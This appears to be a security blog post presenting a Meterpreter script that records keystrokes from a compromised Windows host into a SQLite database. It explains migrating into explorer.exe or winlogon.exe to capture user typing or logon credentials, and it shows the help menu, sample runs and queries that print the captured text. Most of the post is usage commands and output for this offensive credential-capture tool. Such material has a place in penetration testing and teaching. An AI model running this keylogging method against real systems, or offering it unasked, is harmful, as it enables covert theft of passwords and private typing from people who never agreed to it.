After playing with the Meterpreter key logging function and exchanging some emails with my friend Natron, I wrote a Meterpreter script that saves all of the key presses from a compromised host into a SQLite3 DB for later analysis. The script performs the following actions:
- Migrate the Meterpreter process, depending on the desired type of capture and the privileges it is running under, to:
- winlogon.exe – for capturing user credentials as they log in to the compromised host. Only logon credentials will be captured in this mode.
- explorer.exe – for capturing the logged-on user's keystrokes. No Windows logon credentials will be captured in this mode.
- Start capturing keystrokes at the specified time interval; if none is given it polls every 30 seconds.
- Save each capture buffer together with a time stamp into a SQLite DB.
```
meterpreter > run keylogrecorder -h
Keylogger Recorder Meterpreter Script
This script will start the Meterpreter Keylogger and save all keys
in a sqlite3 db for later anlysis. To stop capture hit Ctrl-C
Usage:

OPTIONS:

    -c <opt>  Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0.
    -h        Help menu.
    -t <opt>  Time interval in seconds between recollection of keystrokes, default 30 seconds.

meterpreter >
```
Execution without any options:
```
meterpreter > run keylogrecorder
[*] Migrating process...
[*] explorer.exe Process found, migrating..
[*] Migration Successful!!
[*] Grabbing Desktop Keyboard Input....
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/carlos/.msf3/logs/keylogrecorder/192.168.1.104_20090323.1950/192.168.1.104_20090323.1950.db
[*] Recording ..^C
[*] Error: Interrupt
meterpreter >
```
Execution of the script from a session running with plain user privileges, with the option to migrate to winlogon:
```
meterpreter > run keylogrecorder -c 1
[*] Migrating process...
[*] You are not currently running as System to be able to migrate to winlogon.
[*] Capturing only logon user keystrokes.
[*] explorer.exe Process found, migrating..
[*] Migration Successful!!
[*] Grabbing Desktop Keyboard Input....
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/carlos/.msf3/logs/keylogrecorder/192.168.1.104_20090323.2245/192.168.1.104_20090323.2245.db
[*] Recording ..
```
As you can see, the script will not migrate into winlogon.exe unless the session is already running as SYSTEM (winlogon.exe is a SYSTEM process, so migrating into it needs that privilege); instead it falls back to explorer.exe and captures only the logged-on user's keystrokes, not logon credentials. To process the captured data later on Linux you can use the sqlite3 command-line tool to open the DB and query it. Example:
```
carlos@grinder:~/msf3$ sqlite3 /home/carlos/.msf3/logs/keylogrecorder/192.168.1.104_20090323.2245/192.168.1.104_20090323.2245.db
SQLite version 3.5.9
Enter ".help" for instructions
sqlite> .schema
CREATE TABLE keystrokes (tkey INTEGER PRIMARY KEY,data TEXT,timeEnter DATE);
sqlite> select * from keystrokes;
1||20090323.2253
2||20090323.2326
3||20090323.2359
4||20090323.2431
5||20090323.2504
6|oks <Back> <Back> thi <Back> s is a test. <Return> I really need to get some cofe <Back> fee in m|20090323.2537
7|e. <Return> <Return> thank g <Back> God I'm not working on <Back> a SQL or Oracle db doing insets <Back> <Back> rts o I would be restoring f|20090323.2618
8|rom tape about now. <Return> |20090323.2643
sqlite>
```
Scripts can be written to further parse the DB for information and keywords. I still have to work on a better exit method, and on making sure that empty key capture buffers are not saved in the DB, wasting space. Give it a try and let me know if you like it.
HD is making some changes to the code and to the names in the menu; as soon as I have a chance to test and run it in the lab I will update this post and the script with the new functionality.
For more information please check the Metasploit blog